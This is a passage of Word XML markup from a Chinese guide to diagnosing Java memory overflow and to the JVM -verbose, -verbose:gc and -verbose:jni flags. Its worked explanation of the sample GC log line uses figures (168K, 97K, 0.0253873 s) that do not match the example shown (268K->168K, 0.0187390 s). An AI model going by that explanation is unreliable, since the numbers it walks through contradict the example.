          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="EE6600"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:t>查看</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>日志，分析内存溢出前做过哪些操作，可以大致定位有问题的模块。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000C711E" w:rsidRDefault="000C711E" w:rsidP="000C711E">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="353" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>安排有经验的编程人员对代码进行走查和分析，找出可能发生内存溢出的位置。重点排查以下几点：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000C711E" w:rsidRDefault="000C711E" w:rsidP="000C711E">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="353" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">l         </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>检查代码中是否有死循环或递归调用。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000C711E" w:rsidRDefault="000C711E" w:rsidP="000C711E">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="353" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">l         </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>检查是否有大循环重复产生新对象实体。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000C711E" w:rsidRDefault="000C711E" w:rsidP="000C711E">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="353" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">l         </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>检查对数据库查询中，是否有一次获得全部数据的查询。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE299E" w:rsidRPr="000C711E" w:rsidRDefault="00AE299E" w:rsidP="00E47FDC">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F3FFEC"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="916"/>
          <w:tab w:val="left" w:pos="495"/>
        </w:tabs>
        <w:spacing w:after="107" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004D69AD" w:rsidRPr="00F41A4C" w:rsidRDefault="002D7CF1" w:rsidP="004D69AD">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>1.2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidR="004D69AD" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="004D69AD" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>常见性能参数</w:t>
      </w:r>
      <w:r w:rsidR="009A724A" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>分析</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002B2F2F" w:rsidRPr="009A0F3E" w:rsidRDefault="002B2F2F" w:rsidP="009A0F3E">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>1.2.</w:t>
      </w:r>
      <w:r w:rsidR="002D7CF1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.1</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="00BF0989">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>verbose</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002B2F2F" w:rsidRPr="00E72097" w:rsidRDefault="002B2F2F" w:rsidP="009A653D">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E72097">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">java -verbose[:class|gc|jni] </w:t>
      </w:r>
      <w:r w:rsidRPr="00E72097">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>在输出设备上显示虚拟机运行信息。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00747D8D" w:rsidRPr="00E72097" w:rsidRDefault="001367FC" w:rsidP="001367FC">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="360"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E72097">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">(1) </w:t>
      </w:r>
      <w:r w:rsidR="00AD7736" w:rsidRPr="00E72097">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>v</w:t>
      </w:r>
      <w:r w:rsidR="00747D8D" w:rsidRPr="00E72097">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>erbose</w:t>
      </w:r>
      <w:r w:rsidR="00747D8D" w:rsidRPr="00E72097">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidR="00747D8D" w:rsidRPr="00E72097">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>verbose:class</w:t>
      </w:r>
      <w:r w:rsidR="00747D8D" w:rsidRPr="00E72097">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>含义相同，输出虚拟机装入的类的信息</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001367FC" w:rsidRPr="00E72097" w:rsidRDefault="001367FC" w:rsidP="001367FC">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFC"/>
        <w:spacing w:line="304" w:lineRule="atLeast"/>
        <w:ind w:firstLine="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E72097">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">(2) </w:t>
      </w:r>
      <w:r w:rsidRPr="00E72097">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>java –verbose:gc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001367FC" w:rsidRDefault="001367FC" w:rsidP="00CB7F35">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFC"/>
        <w:spacing w:line="304" w:lineRule="atLeast"/>
        <w:ind w:firstLine="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E72097">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>在虚拟机发生内存回收时在输出设备显示信息，格式如下：</w:t>
      </w:r>
      <w:r w:rsidRPr="00E72097">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> [Full GC 268K-&gt;168K(1984K), 0.0187390 secs] </w:t>
      </w:r>
      <w:r w:rsidRPr="00E72097">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>该参数用来监视虚拟机内存回收的情况。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA0925" w:rsidRDefault="00FA0925" w:rsidP="00CB7F35">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFC"/>
        <w:spacing w:line="304" w:lineRule="atLeast"/>
        <w:ind w:firstLine="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFC"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFC"/>
        </w:rPr>
        <w:t>箭头前后的数据</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFC"/>
        </w:rPr>
        <w:t>168K</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFC"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFC"/>
        </w:rPr>
        <w:t>97K</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFC"/>
        </w:rPr>
        <w:t>分别表示垃圾收集</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFC"/>
        </w:rPr>
        <w:t>GC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFC"/>
        </w:rPr>
        <w:t>前后所有存活对象使用的内存容量，说明有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFC"/>
        </w:rPr>
        <w:t>168K-97K=71K</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFC"/>
        </w:rPr>
        <w:t>的对象容量被回收，括号内的数据</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFC"/>
        </w:rPr>
        <w:t>1984K</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFC"/>
        </w:rPr>
        <w:t>为堆内存的总容量，收集所需要的时间是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFC"/>
        </w:rPr>
        <w:t>0.0253873</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFC"/>
        </w:rPr>
        <w:t>秒（这个时间在每次执行的时候会有所不同）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C57A0" w:rsidRDefault="005C57A0" w:rsidP="005C57A0">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFC"/>
        <w:spacing w:line="304" w:lineRule="atLeast"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFC"/>
        </w:rPr>
        <w:t>(3)</w:t>
      </w:r>
      <w:r w:rsidRPr="005C57A0">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>java –verbose:jni</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C57A0" w:rsidRDefault="005C57A0" w:rsidP="005C57A0">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFC"/>
        <w:spacing w:line="304" w:lineRule="atLeast"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>-verbose:jni</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>输出</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>native</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>方法调用的相关情况，一般用于诊断</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>jni</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>调用错误信息。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C57A0" w:rsidRDefault="005C57A0" w:rsidP="005C57A0">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFC"/>
        <w:spacing w:line="304" w:lineRule="atLeast"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>在虚拟机调用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>native</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>方法时输出设备显示信息，格式如下：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> [Dynamic-linking native method HelloNative.sum ... JNI] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>该参数用来监视虚拟机调用本地方法的情况，在发生</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>jni</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>错误时可为诊断提供便利</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00953BCC" w:rsidRPr="005C57A0" w:rsidRDefault="00953BCC" w:rsidP="00CB7F35">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFC"/>
        <w:spacing w:line="304" w:lineRule="atLeast"/>
        <w:ind w:firstLine="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BF0989" w:rsidRPr="00621676" w:rsidRDefault="00BF0989" w:rsidP="00621676">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>1.2.</w:t>
      </w:r>
      <w:r w:rsidR="002D7CF1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.2</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="001367FC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
